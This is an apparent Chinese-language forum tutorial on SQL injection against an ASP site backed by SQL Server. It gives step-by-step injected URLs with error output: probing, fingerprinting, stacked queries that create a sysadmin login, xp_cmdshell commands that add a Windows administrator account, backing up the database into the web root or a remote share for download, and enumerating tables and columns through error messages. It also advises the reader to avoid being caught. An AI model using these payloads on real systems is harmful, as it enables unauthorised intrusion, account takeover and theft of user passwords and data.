在一個供求信息發佈的網站上測試了一下,頁面http://www.xxx.com/new/new.asp?id=49
我做了如下測試:(1) http://www.xxx.com/new/new.asp?id=49’
Microsoft OLE DB Provider for ODBC Drivers 錯誤 '80040e14
[Microsoft][ODBC Microsoft Access Driver] 字符串的語法錯誤
在查詢表達式 'ID=49'' 中。
/new.asp,行36
(2) http://www.xxx.com/new/new.asp?id=49 and 1=1
(正常返回頁面)
(3) http://www.xxx.com/new/new.asp?id=49 and 1=2
Microsoft OLE DB Provider for ODBC Drivers 錯誤 '800a0bcd'
BOF 或 EOF 中有一個是“真”,或者當前的記錄已被刪除,所需的操作要求一個當前的記錄。
/new.asp,行42
注:上面的測試已經可以看出有SQL注入的機會,我們用下面一個句子來判斷他數據庫類型和登陸身份。
Http://www.xxx.com/new/new.asp?id=49 and user>0
Microsoft OLE DB Provider for ODBC Drivers 錯誤 '800a0bcd'
將nvarchar值 ”dbo” 轉換數據類型爲 int 的列時發生語法錯誤
/new.asp,行42
注:如果顯示“dbo” 轉換數據類型爲 int 的列時發生語法錯誤 那麼就可以用我下面介紹的方法來獲得系統管理權限,如果是“abc” 轉換數據類型爲 int 的列時發生語法錯誤 那麼就用不能用我下面的介紹來獲得系統權限了。
獲得以上信息後,就可以提交以下URL來一步一步的獲得SQL管理員權限和系統權限了。
(1) http://www.xxx.com/new/new.asp?id=49;exec
aster.dbo.sp_addlogin fmzm;--
添加SQL用戶
(2) http://www.xxx.com/new/new.asp?id=49;exec master.dbo.sp_password null,fmzm,fmzm;--
設置SQL帳號FMZM 的密碼爲 FMZM
(3) http://www.xxx.com/new/new.asp?id=49;exec master.dbo.sp_addsrvrolemember sysadmin fmzm;--
提升權限:加FMZM進sysadmin管理組(有時候會不成功,就常識下面的句子
;exec master.dbo.sp_addsrvrolemember fmzm,sysadmin-- 爲什麼會這樣,我也不清清楚,我就遇到了?栽 。。。)
(4) http://www.xxx.com/new/new.asp?id=49;exec master.dbo.xp_cmdshell 'net user fmzm fmzm /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
建立一個系統用FMZM 並設置其密碼爲FMZM
(注:/workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes 這些很關鍵,如果不加這些,你建立的用戶很有可能無法登陸,這些是啓用你的帳號,並且使密碼永不過期的一些相關設置。)
(5) http://www.xxx.com/new/new.asp?id=49;exec master.dbo.xp_cmdshell 'net localgroup administrators fmzm /add';--
把帳號FMZM加入到管理員組
OK,到此爲止,已經得到了SQL管理權限和系統權限了,還有什麼不能做的呢?把上面的句子變個形 開個TELNET,或者用SQL連接器去連接,隨便你怎麼整了,記得別暴露自己哦 :)目前有些好的IDS已經開始監視xp_cmdshell這些關鍵字了.
附:(1) http://Site/url.asp?id=1 ;;and db_name()>0
前面有個類似的例子and user>0,作用是獲取連接用戶名,db_name()是另一個系統變量,返回的是連接的數據庫名。
(2) http://Site/url.asp?id=1;backup database 數據庫名 to disk=’c:/inetpub/wwwroot/1.db’;--
這是相當狠的一招,從③拿到的數據庫名,加上某些IIS出錯暴露出的絕對路徑,將數據庫備份到Web目錄下面,再用HTTP把整個數據庫就完完整整的下載回來,所有的管理員及用戶密碼都一覽無遺!在不知道絕對路徑的時候,還可以備份到網絡地址的方法(如//202.96.xx.xx/Share/1.db),但成功率不高。
(3) http://Site/url.asp?id=1 ;;and (Select Top 1 name from sysobjects where xtype=’U’ and status>0)>0
sysobjects是SQLServer的系統表,存儲着所有的表名、視圖、約束及其它對象,xtype=’U’ and status>0,表示用戶建立的表名,上面的語句將第一個表名取出,與0比較大小,讓報錯信息把表名暴露出來。第二、第三個表名怎麼獲取?還是可以
自己考慮下。
(4) http://Site/url.asp?id=1 ;;and (Select Top 1 col_name(object_id(‘表名’),1) from sysobjects)>0
從(3)拿到表名後,用object_id(‘表名’)獲取表名對應的內部ID,col_name(表名ID,1)代表該表的第1個字段名,將1換成2,3,4...就可以逐個獲取所猜解表裏面的字段名。